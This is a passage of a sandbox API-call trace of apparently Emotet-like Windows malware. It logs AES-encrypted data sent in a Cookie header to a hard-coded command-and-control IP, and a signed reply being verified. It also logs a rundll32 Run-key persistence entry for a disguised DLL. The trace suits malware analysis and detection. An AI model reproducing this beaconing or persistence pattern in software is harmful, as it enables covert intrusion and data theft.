(pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0408.462] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0408.463] FindNextFileW (in: hFindFile=0x2a838e0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0408.463] FindClose (in: hFindFile=0x2a838e0 | out: hFindFile=0x2a838e0) returned 1 [0408.463] GetProcessHeap () returned 0x530000 [0408.463] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0408.463] GetProcessHeap () returned 0x530000 [0408.463] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0408.463] GetProcessHeap () returned 0x530000 [0408.464] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0408.464] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0408.465] GetProcessHeap () returned 0x530000 [0408.465] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0408.465] GetProcessHeap () returned 0x530000 [0408.465] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0408.465] GetProcessHeap () returned 0x530000 [0408.465] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0408.465] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0408.465] GetProcessHeap () returned 0x530000 [0408.466] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0408.466] GetProcessHeap () returned 0x530000 [0408.466] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0408.466] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0408.466] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0408.466] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0408.466] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0408.466] GetProcessHeap () returned 0x530000 [0408.466] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0408.466] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0408.466] GetProcessHeap () returned 0x530000 [0408.466] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76350 [0408.466] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0408.466] GetProcessHeap () returned 0x530000 [0408.466] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0408.466] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0408.467] GetProcessHeap () returned 0x530000 [0408.467] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x11b) returned 0x2a49848 [0408.467] GetProcessHeap () returned 0x530000 [0408.467] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0408.467] GetProcessHeap () returned 0x530000 [0408.467] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0408.467] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x11b, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0408.467] GetProcessHeap () returned 0x530000 [0408.467] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2fa) returned 0x2a89708 [0408.467] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x11b, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTo1V98nY7UM6JulhzwC8QxXXpU8Ox4R1i1Ws8KmBPi6hQ+fg+DXLdWnA65E3+YuSZteFcqvsmQ7dP9TaPD/81A2bulfaQ5s0rW6YpRDHfJ03/9xykzTpaHi6T44YcGVKRZBxfJdxHAZabj+xJCPYNy2XCne27JeYOMOouQ==", pcchString=0x2cf504) returned 1 [0408.468] GetProcessHeap () returned 0x530000 [0408.468] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0408.468] GetProcessHeap () returned 0x530000 [0408.468] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630d0 [0408.468] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: cvFEGOJUWr=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTo1V98nY7UM6JulhzwC8QxXXpU8Ox4R1i1Ws8KmBPi6hQ+fg+DXLdWnA65E3+YuSZteFcqvsmQ7dP9TaPD/81A2bulfaQ5s0rW6YpRDHfJ03/9xykzTpaHi6T44YcGVKRZBxfJdxHAZabj+xJCPYNy2XCne27JeYOMOouQ==\r\n") returned 401 [0408.468] GetProcessHeap () returned 0x530000 [0408.468] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630d0 | out: hHeap=0x530000) returned 1 [0408.468] GetProcessHeap () returned 0x530000 [0408.468] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89708 | out: hHeap=0x530000) returned 1 [0408.468] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0408.469] GetProcessHeap () returned 0x530000 [0408.469] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0408.469] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0408.471] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="hmoSo", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0408.472] GetProcessHeap () returned 0x530000 [0408.472] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0408.472] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0408.472] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0408.472] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0408.472] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: cvFEGOJUWr=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTo1V98nY7UM6JulhzwC8QxXXpU8Ox4R1i1Ws8KmBPi6hQ+fg+DXLdWnA65E3+YuSZteFcqvsmQ7dP9TaPD/81A2bulfaQ5s0rW6YpRDHfJ03/9xykzTpaHi6T44YcGVKRZBxfJdxHAZabj+xJCPYNy2XCne27JeYOMOouQ==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0409.581] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0409.581] GetProcessHeap () returned 0x530000 [0409.581] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0409.581] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x362) returned 1 [0409.581] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48162, dwNumberOfBytesToRead=0xfc9e, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48162*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0409.582] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0409.582] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0409.582] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0409.582] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0409.582] GetProcessHeap () returned 0x530000 [0409.582] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0409.582] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76350, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76350, pcbResult=0x2cf51c) returned 0x0 [0409.582] GetProcessHeap () returned 0x530000 [0409.582] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0409.582] GetProcessHeap () returned 0x530000 [0409.582] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0409.582] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0409.583] GetProcessHeap () returned 0x530000 [0409.583] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0409.583] GetProcessHeap () returned 0x530000 [0409.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0409.584] GetProcessHeap () returned 0x530000 [0409.584] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0409.584] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0409.584] GetProcessHeap () returned 0x530000 [0409.584] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0409.584] GetProcessHeap () returned 0x530000 [0409.584] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0409.584] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0409.584] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76398, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0409.584] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0409.584] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0409.585] GetProcessHeap () returned 0x530000 [0409.585] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0409.585] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0409.585] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76354, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0409.587] GetProcessHeap () returned 0x530000 [0409.587] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c750 [0409.587] GetProcessHeap () returned 0x530000 [0409.587] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0409.587] GetProcessHeap () returned 0x530000 [0409.588] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0409.588] GetProcessHeap () returned 0x530000 [0409.588] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a49848 | out: hHeap=0x530000) returned 1 [0409.588] GetProcessHeap () returned 0x530000 [0409.588] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0409.588] GetProcessHeap () returned 0x530000 [0409.589] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0409.589] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0409.589] GetProcessHeap () returned 0x530000 [0409.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83ba0 [0409.589] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VervPB") returned 96 [0409.589] GetProcessHeap () returned 0x530000 [0409.589] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83ba0 | out: hHeap=0x530000) returned 1 [0409.589] GetProcessHeap () returned 0x530000 [0409.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0409.589] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x628, lpdwDisposition=0x0) returned 0x0 [0409.590] GetProcessHeap () returned 0x530000 [0409.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0409.590] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VervPB") returned 96 [0409.590] RegSetValueExW (in: hKey=0x628, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VervPB", cbData=0xc2 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",VervPB") returned 0x0 [0409.591] RegCloseKey (hKey=0x628) returned 0x0 [0409.591] GetProcessHeap () returned 0x530000 [0409.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c750 | out: hHeap=0x530000) returned 1 [0409.591] GetProcessHeap () returned 0x530000 [0409.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0409.592] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe90ab) returned 0x102 [0419.597] GetProcessHeap () returned 0x530000 [0419.597] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0419.598] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0419.598] GetProcessHeap () returned 0x530000 [0419.598] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0419.598] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0419.598] GetProcessHeap () returned 0x530000 [0419.598] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0419.598] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0419.598] GetProcessHeap () returned 0x530000 [0419.598] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0419.598] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0419.598] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0419.598] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0419.598] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0419.598] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0419.599] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0419.599] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0419.599] GetProcessHeap () returned 0x530000 [0419.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0419.599] GetProcessHeap () returned 0x530000 [0419.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0419.599] GetProcessHeap () returned 0x530000 [0419.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc8a0 [0419.599] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0419.599] GetProcessHeap () returned 0x530000 [0419.599] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0419.599] GetProcessHeap () returned 0x530000 [0419.600] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc8a0 | out: hHeap=0x530000) returned 1 [0419.600] GetProcessHeap () returned 0x530000 [0419.600] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0419.600] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0419.600] GetProcessHeap () returned 0x530000 [0419.600] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0419.600] GetProcessHeap () returned 0x530000 [0419.600] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0419.600] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0419.600] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0419.600] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0419.600] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0419.600] GetProcessHeap () returned 0x530000 [0419.600] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0419.600] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0419.601] GetProcessHeap () returned 0x530000 [0419.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76488 [0419.601] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0419.601] GetProcessHeap () returned 0x530000 [0419.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0419.601] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0419.601] GetProcessHeap () returned 0x530000 [0419.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x116) returned 0x2a49848 [0419.601] GetProcessHeap () returned 0x530000 [0419.601] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0419.601] GetProcessHeap () returned 0x530000 [0419.601] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0419.601] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x116, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0419.601] GetProcessHeap () returned 0x530000 [0419.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2ea) returned 0x2a89708 [0419.601] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x116, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTvQ2LAD7590jifZWLJ6+sukX+m7ocZWYtvbbG0zJvsfxYPwQSXjAsZOkjPokaSiOciFfF0o9JHq9yfP7yMTBFz0niRgXvN3BUfg5pQRUPdHnDpmZj8IERtaj4cB5KRJcCEYvBpZ0/1wiIEEUrmkay9Sh2ux/n3w=", pcchString=0x2cf504) returned 1 [0419.601] GetProcessHeap () returned 0x530000 [0419.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0419.601] GetProcessHeap () returned 0x530000 [0419.602] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630a8 [0419.602] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: 